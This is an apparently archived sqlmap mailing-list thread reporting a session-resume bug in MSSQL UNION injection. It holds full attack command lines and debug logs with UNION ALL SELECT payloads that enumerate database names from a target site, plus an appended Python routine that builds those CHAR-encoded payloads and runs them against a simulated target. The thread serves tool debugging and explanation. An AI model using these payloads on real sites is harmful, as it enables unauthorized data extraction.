Re: [sqlmap-users] Bug(?) with resuming/not resuming sessions with MSSQL (possible anothers dbms)
From: David G. <sk...@gm...> - 2010-03-19 02:52:58
The problem happens because, when sqlmap performs the resume of the UNIONSQLi session, it does not check if it already has the amount of dbs, tables or columns before attempting to retrieve their names through UNIONSQLi.

On Thu, Mar 18, 2010 at 11:23 PM, David Guimaraes <sk...@gm...> wrote:
> # svn info
> Path: .
> URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
> Repository Root: https://svn.sqlmap.org/sqlmap
> Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
> Revision: 1497
> Node Kind: directory
> Schedule: normal
> Last Changed Author: inquisb
> Last Changed Rev: 1497
> Last Changed Date: 2010-03-18 14:36:58 -0300 (Thu, 18 Mar 2010)
>
>
> On Thu, Mar 18, 2010 at 11:22 PM, David Guimaraes <sk...@gm...> wrote:
>> When I try to run sqlmap this way:
>>
>> # ./sqlmap.py --threads 20 -v 2 --union-use -u "http://www.vulnsite.com/vulnasp.asp?prof=247&menu=vulnaspes&art=5021" -p art --string WRAPED
>>
>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [*] starting at: 22:53:24
>>
>> [22:53:24] [DEBUG] initializing the configuration
>> [22:53:24] [DEBUG] initializing the knowledge base
>> [22:53:24] [DEBUG] cleaning up configuration parameters
>> [22:53:24] [DEBUG] setting the HTTP timeout
>> [22:53:24] [DEBUG] setting the HTTP method to GET
>> [22:53:24] [DEBUG] creating HTTP requests opener object
>> [22:53:24] [DEBUG] parsing XML queries file
>> [22:53:24] [INFO] using '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session file
>> [22:53:24] [INFO] testing connection to the target url
>> [22:53:25] [INFO] testing if the provided string is within the target URL page content
>> [22:53:29] [WARNING] the testable parameter 'art' you provided is not into the Cookie
>> [22:53:29] [INFO] testing sql injection on GET parameter 'art' with 0 parenthesis
>> [22:53:29] [INFO] testing unescaped numeric injection on GET parameter 'art'
>> [22:53:29] [DEBUG] got HTTP error code: 500
>> [22:53:30] [DEBUG] got HTTP error code: 500
>> [22:53:30] [INFO] confirming unescaped numeric injection on GET parameter 'art'
>> [22:53:30] [DEBUG] got HTTP error code: 500
>> [22:53:30] [INFO] GET parameter 'art' is unescaped numeric injectable with 0 parenthesis
>> [22:53:30] [INFO] testing for parenthesis on injectable parameter
>> [22:53:31] [DEBUG] got HTTP error code: 500
>> [22:53:31] [DEBUG] got HTTP error code: 500
>> [22:53:32] [DEBUG] got HTTP error code: 500
>> [22:53:32] [INFO] the injectable parameter requires 0 parenthesis
>> [22:53:32] [INFO] testing MySQL
>> [22:53:32] [DEBUG] got HTTP error code: 500
>> [22:53:32] [WARNING] the back-end DMBS is not MySQL
>> [22:53:32] [INFO] testing Oracle
>> [22:53:33] [DEBUG] got HTTP error code: 500
>> [22:53:33] [WARNING] the back-end DMBS is not Oracle
>> [22:53:33] [INFO] testing PostgreSQL
>> [22:53:33] [DEBUG] got HTTP error code: 500
>> [22:53:33] [WARNING] the back-end DMBS is not PostgreSQL
>> [22:53:33] [INFO] testing Microsoft SQL Server
>> [22:53:34] [DEBUG] got HTTP error code: 500
>> [22:53:34] [INFO] confirming Microsoft SQL Server
>> [22:53:35] [DEBUG] got HTTP error code: 500
>> [22:53:35] [DEBUG] got HTTP error code: 500
>> [22:53:35] [INFO] the back-end DBMS is Microsoft SQL Server
>> web server operating system: Windows 2000
>> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
>> back-end DBMS: Microsoft SQL Server 2005
>>
>> [22:53:35] [INFO] testing inband sql injection on parameter 'art' with NULL bruteforcing technique
>> [22:53:39] [DEBUG] got HTTP error code: 500
>> [22:53:39] [DEBUG] got HTTP error code: 500
>> [22:53:40] [DEBUG] got HTTP error code: 500
>> [22:53:40] [DEBUG] got HTTP error code: 500
>> [22:53:44] [DEBUG] got HTTP error code: 500
>> [22:53:44] [DEBUG] got HTTP error code: 500
>> [22:53:44] [INFO] confirming full inband sql injection on parameter 'art'
>> [22:53:45] [DEBUG] got HTTP error code: 500
>> [22:53:45] [DEBUG] got HTTP error code: 500
>> [22:53:46] [DEBUG] got HTTP error code: 500
>> [22:53:46] [DEBUG] got HTTP error code: 500
>> [22:53:47] [DEBUG] got HTTP error code: 500
>> [22:53:47] [DEBUG] got HTTP error code: 500
>> [22:53:47] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability
>> [22:53:47] [INFO] confirming partial (single entry) inband sql injection on parameter 'art' by appending a false condition after the parameter value
>> [22:53:48] [DEBUG] got HTTP error code: 500
>> [22:53:49] [DEBUG] got HTTP error code: 500
>> [22:53:49] [DEBUG] got HTTP error code: 500
>> [22:53:49] [INFO] the target url is affected by an exploitable partial (single entry) inband sql injection vulnerability
>> valid union: 'http://www.vulnsite.com:80/vulnasp.asp?prof=247&menu=vulnaspes&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%206410=6410'
>>
>> [22:53:49] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap8/output/www.vulnsite.com'
>>
>> [*] shutting down at: 22:53:49
>>
>>
>> It correctly detects the UNIONSQLi and ends OK. Soon after that, I try to retrieve the databases by adding only the argument "--dbs", and it cannot retrieve them with UNIONSQLi, for the strange reason described below, and goes to BLINDSQLi. It tries to find the right table name without first knowing how many there really are through UNIONSQLi, and directly tries to find out how many there are and their names using BLINDSQLi.
>>
>> Example with resume:
>>
>> # ./sqlmap.py --threads 20 -v 2 --union-use -u "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" -p art --string WRAPED --dbs
>>
>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [*] starting at: 22:54:40
>>
>> [22:54:40] [DEBUG] initializing the configuration
>> [22:54:40] [DEBUG] initializing the knowledge base
>> [22:54:40] [DEBUG] cleaning up configuration parameters
>> [22:54:40] [DEBUG] setting the HTTP timeout
>> [22:54:40] [DEBUG] setting the HTTP method to GET
>> [22:54:40] [DEBUG] creating HTTP requests opener object
>> [22:54:40] [DEBUG] parsing XML queries file
>> [22:54:40] [INFO] using '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session file
>> [22:54:40] [INFO] resuming string match 'WRAPED' from session file
>> [22:54:40] [INFO] resuming injection point 'GET' from session file
>> [22:54:40] [INFO] resuming injection parameter 'art' from session file
>> [22:54:40] [INFO] resuming injection type 'numeric' from session file
>> [22:54:40] [INFO] resuming 0 number of parenthesis from session file
>> [22:54:40] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
>> [22:54:40] [INFO] resuming union comment '--' from session file
>> [22:54:40] [INFO] resuming union count 6 from session file
>> [22:54:40] [INFO] resuming union position 2 from session file
>> [22:54:40] [INFO] testing connection to the target url
>> [22:54:43] [WARNING] the testable parameter 'art' you provided is not into the Cookie
>> [22:54:43] [INFO] testing for parenthesis on injectable parameter
>> [22:54:43] [DEBUG] skipping test for MySQL
>> [22:54:43] [DEBUG] skipping test for Oracle
>> [22:54:43] [DEBUG] skipping test for PostgreSQL
>> [22:54:43] [INFO] the back-end DBMS is Microsoft SQL Server
>> web server operating system: Windows 2000
>> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
>> back-end DBMS: Microsoft SQL Server 2005
>>
>> [22:54:43] [INFO] fetching database names
>> [22:54:43] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(116)+CHAR(104)+CHAR(116)+CHAR(78)+CHAR(80)+CHAR(119)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(106)+CHAR(86)+CHAR(81)+CHAR(97)+CHAR(77)+CHAR(109), NULL, NULL, NULL FROM master..sysdatabases-- AND 2796=2796
>> [22:54:44] [DEBUG] got HTTP error code: 500
>> [22:54:45] [WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going blind
>> [22:54:45] [INFO] fetching number of databases
>> [22:54:45] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases
>> [22:54:45] [INFO] retrieved: [22:54:47] [DEBUG] got HTTP error code: 500
>> [22:54:48] [DEBUG] got HTTP error code: 500
>> .
>> .
>> .
>> [23:12:13] [DEBUG] performed 42 queries in 16 seconds
>> available databases [3]:
>> [*] mXX
>> [*] pXX
>> [*] tXX
>>
>> [23:12:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap8/output/www.vulnsite.com'
>>
>> [*] shutting down at: 23:12:13
>>
>>
>> But if I delete the session and start sqlmap over with "--dbs" enabled, it correctly retrieves how many databases there are and their names using the correct technique (UNIONSQLi).
>>
>> Example without resume (using --dbs the first time):
>> # rm -rf output/*
>> # ./sqlmap.py --threads 20 -v 2 --union-use -u "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" -p art --string WRAPED --dbs
>>
>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [*] starting at: 23:16:02
>>
>> [23:16:02] [DEBUG] initializing the configuration
>> [23:16:02] [DEBUG] initializing the knowledge base
>> [23:16:02] [DEBUG] cleaning up configuration parameters
>> [23:16:02] [DEBUG] setting the HTTP timeout
>> [23:16:02] [DEBUG] setting the HTTP method to GET
>> [23:16:02] [DEBUG] creating HTTP requests opener object
>> [23:16:02] [DEBUG] parsing XML queries file
>> [23:16:02] [INFO] using '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session file
>> [23:16:02] [INFO] testing connection to the target url
>> [23:16:02] [INFO] testing if the provided string is within the target URL page content
>> [23:16:03] [WARNING] the testable parameter 'art' you provided is not into the Cookie
>> [23:16:03] [INFO] testing sql injection on GET parameter 'art' with 0 parenthesis
>> [23:16:03] [INFO] testing unescaped numeric injection on GET parameter 'art'
>> [23:16:04] [DEBUG] got HTTP error code: 500
>> [23:16:04] [DEBUG] got HTTP error code: 500
>> [23:16:04] [INFO] confirming unescaped numeric injection on GET parameter 'art'
>> [23:16:05] [DEBUG] got HTTP error code: 500
>> [23:16:05] [INFO] GET parameter 'art' is unescaped numeric injectable with 0 parenthesis
>> [23:16:05] [INFO] testing for parenthesis on injectable parameter
>> [23:16:05] [DEBUG] got HTTP error code: 500
>> [23:16:05] [DEBUG] got HTTP error code: 500
>> [23:16:06] [DEBUG] got HTTP error code: 500
>> [23:16:06] [INFO] the injectable parameter requires 0 parenthesis
>> [23:16:06] [INFO] testing MySQL
>> [23:16:06] [DEBUG] got HTTP error code: 500
>> [23:16:06] [WARNING] the back-end DMBS is not MySQL
>> [23:16:06] [INFO] testing Oracle
>> [23:16:07] [DEBUG] got HTTP error code: 500
>> [23:16:07] [WARNING] the back-end DMBS is not Oracle
>> [23:16:07] [INFO] testing PostgreSQL
>> [23:16:07] [DEBUG] got HTTP error code: 500
>> [23:16:07] [WARNING] the back-end DMBS is not PostgreSQL
>> [23:16:07] [INFO] testing Microsoft SQL Server
>> [23:16:08] [DEBUG] got HTTP error code: 500
>> [23:16:08] [INFO] confirming Microsoft SQL Server
>> [23:16:14] [DEBUG] got HTTP error code: 500
>> [23:16:15] [DEBUG] got HTTP error code: 500
>> [23:16:15] [INFO] the back-end DBMS is Microsoft SQL Server
>> web server operating system: Windows 2000
>> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
>> back-end DBMS: Microsoft SQL Server 2005
>>
>> [23:16:15] [INFO] testing inband sql injection on parameter 'art' with NULL bruteforcing technique
>> [23:16:15] [DEBUG] got HTTP error code: 500
>> [23:16:15] [DEBUG] got HTTP error code: 500
>> [23:16:16] [DEBUG] got HTTP error code: 500
>> [23:16:16] [DEBUG] got HTTP error code: 500
>> [23:16:16] [DEBUG] got HTTP error code: 500
>> [23:16:17] [DEBUG] got HTTP error code: 500
>> [23:16:17] [INFO] confirming full inband sql injection on parameter 'art'
>> [23:16:17] [DEBUG] got HTTP error code: 500
>> [23:16:18] [DEBUG] got HTTP error code: 500
>> [23:16:18] [DEBUG] got HTTP error code: 500
>> [23:16:19] [DEBUG] got HTTP error code: 500
>> [23:16:19] [DEBUG] got HTTP error code: 500
>> [23:16:20] [DEBUG] got HTTP error code: 500
>> [23:16:20] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability
>> [23:16:20] [INFO] confirming partial (single entry) inband sql injection on parameter 'art' by appending a false condition after the parameter value
>> [23:16:21] [DEBUG] got HTTP error code: 500
>> [23:16:22] [DEBUG] got HTTP error code: 500
>> [23:16:27] [DEBUG] got HTTP error code: 500
>> [23:16:27] [INFO] the target url is affected by an exploitable partial (single entry) inband sql injection vulnerability
>> valid union: 'http://www.vulnsite.com:80/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20716=716'
>>
>> [23:16:27] [INFO] fetching database names
>> [23:16:27] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(COUNT(name) AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases-- AND 2578=2578
>> [23:16:28] [DEBUG] got HTTP error code: 500
>> [23:16:28] [DEBUG] performed 1 queries in 0 seconds
>> [23:16:28] [INFO] the SQL query provided returns 3 entries
>> [23:16:28] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases)-- AND 7328=7328
>> [23:16:31] [DEBUG] got HTTP error code: 500
>> [23:16:31] [DEBUG] performed 2 queries in 3 seconds
>> [23:16:31] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 1 name FROM master..sysdatabases)-- AND 1346=1346
>> [23:16:32] [DEBUG] got HTTP error code: 500
>> [23:16:32] [DEBUG] performed 3 queries in 0 seconds
>> [23:16:32] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 2 name FROM master..sysdatabases)-- AND 231=231
>> [23:16:33] [DEBUG] got HTTP error code: 500
>> [23:16:33] [DEBUG] performed 4 queries in 1 seconds
>> available databases [3]:
>> [*] mXX
>> [*] pXX
>> [*] tXX
>>
>> [23:16:33] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap8/output/www.vulnsite.com'
>>
>> [*] shutting down at: 23:16:33
>>
>>
>> The same thing happens if I send sqlmap to dump the tables (--tables). If I do not pass --tables the first time it runs and discovers the vulnerability, when it runs again with the resumed file, it just goes right to BLINDSQLi, taking much longer to complete the task!
>>
>>
>>
>> --
>> David Gomes Guimarães
>>
>
>
>
> --
> David Gomes Guimarães
>

--
David Gomes Guimarães
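The two enumeration paths the thread contrasts, reduced to a runnable model: the fresh run asks for COUNT(name) first and then pulls one row per request with `WHERE name NOT IN (SELECT TOP n name FROM master..sysdatabases)`, while the resumed run asks for every row in a single UNION with no count and, on a partial (single entry) target, gets only one row back. This is an added example written for this page; it is not code from the thread or from sqlmap. The marker strings TtMrkZ and HIBZLe are decoded from the CHAR() sequences in the third run; `simulated_target` is a constructed stand-in for the vulnerable page that renders only the first row of the UNION, as the reported target did, and the database names are the redacted ones from the report. No network access is needed.

```python
import re

# Constructed stand-in for master..sysdatabases on the simulated target
# (the report redacts the real names as mXX, pXX, tXX).
SIMULATED_SYSDATABASES = ["mXX", "pXX", "tXX"]

UNION_COUNT = 6       # "resuming union count 6" in the report
UNION_POSITION = 2    # "resuming union position 2" (0-based column index)
# Marker strings decoded from the CHAR() sequences in the report's third run.
PREFIX, SUFFIX = "TtMrkZ", "HIBZLe"


def char_encode(text):
    """Encode a string as CHAR(n)+CHAR(n)+... so the payload needs no quotes."""
    return "+".join("CHAR(%d)" % ord(c) for c in text)


def union_query(expression, where=""):
    """Build the MSSQL UNION ALL SELECT payload, placing the expression in the
    column sqlmap found visible and wrapping it with the markers."""
    columns = ["NULL"] * UNION_COUNT
    columns[UNION_POSITION] = (
        char_encode(PREFIX)
        + "+ISNULL(CAST(%s AS VARCHAR(8000)), CHAR(32))+" % expression
        + char_encode(SUFFIX)
    )
    return "UNION ALL SELECT %s FROM master..sysdatabases%s-- " % (", ".join(columns), where)


def extract_values(page):
    """Pull every marker-wrapped value out of a response body."""
    return re.findall(re.escape(PREFIX) + "(.*?)" + re.escape(SUFFIX), page, re.S)


def simulated_target(payload):
    """Constructed stand-in for the vulnerable page: a partial (single entry)
    inband target that renders only the first row of the UNION, as the
    reported target did. It interprets just enough of the payload to answer."""
    if "COUNT(name)" in payload:
        rows = [str(len(SIMULATED_SYSDATABASES))]
    else:
        top = re.search(r"SELECT TOP (\d+) name", payload)
        skip = int(top.group(1)) if top else 0
        rows = SIMULATED_SYSDATABASES[skip:]
    return "<html>%s%s%s</html>" % (PREFIX, rows[0], SUFFIX) if rows else "<html></html>"


def fetch_count(fetch_page):
    """Count first, exactly as the fresh run did ('returns 3 entries')."""
    return int(extract_values(fetch_page(union_query("COUNT(name)")))[0])


def fetch_names_paginated(fetch_page, count):
    """One request per row: exclude the first n names with NOT IN (SELECT TOP n ...)."""
    names = []
    for n in range(count):
        where = " WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases)" % n
        values = extract_values(fetch_page(union_query("name", where)))
        if not values:
            break
        names.append(values[0])
    return names


def enumerate_databases(fetch_page, resumed_count=None):
    """Reuse a count already stored in the session, otherwise fetch it, and only
    then paginate. Returns (names, complete)."""
    count = resumed_count if resumed_count is not None else fetch_count(fetch_page)
    names = fetch_names_paginated(fetch_page, count)
    return names, len(names) == count


def resume_without_count(fetch_page):
    """The resumed path from the report: no count, so every row is requested at
    once. A single-entry target hands back one row, with no way to tell
    whether that is all of them."""
    return extract_values(fetch_page(union_query("name")))


if __name__ == "__main__":
    print("fresh run:", enumerate_databases(simulated_target))
    print("resumed run without count:", resume_without_count(simulated_target))
```

`enumerate_databases(simulated_target)` returns all three names with `complete` set, whether the count is fetched or passed in as `resumed_count`; `resume_without_count(simulated_target)` returns only `["mXX"]`, which is the point at which a tool that has no count to compare against has to fall back to a slower technique.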